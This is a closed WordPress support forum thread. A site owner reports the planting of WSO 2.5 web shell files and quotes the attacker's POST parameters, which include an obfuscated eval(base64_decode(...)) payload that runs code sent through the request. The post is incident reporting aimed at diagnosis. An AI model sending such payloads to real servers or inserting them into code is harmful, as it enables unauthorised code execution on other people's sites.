Support » Fixing WordPress » wordpress 3.3.1 hacked

  • the hacker can create a file in wordpress directory or in wp-admin directory. the filename is always wnnnnnnnnw.php where n is a number, for exemple : w80998004w.php
    this file contain the wso shel 2.5.

    Finally a find how the hacker can create this file.
    He send a post command to the webserver :
    (you can find all parameters here : )

    [a] => Php
    [ajax] => true
    [p1] => eval(base64_decode(str_replace(chr(32),chr(43),$_POST[chr(99)])));
    [showimg] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7
    [w] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7

    Ok, if the permissions are correctly set, the file can’t be created.
    But I think there is a bug somewhere.

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘wordpress 3.3.1 hacked’ is closed to new replies.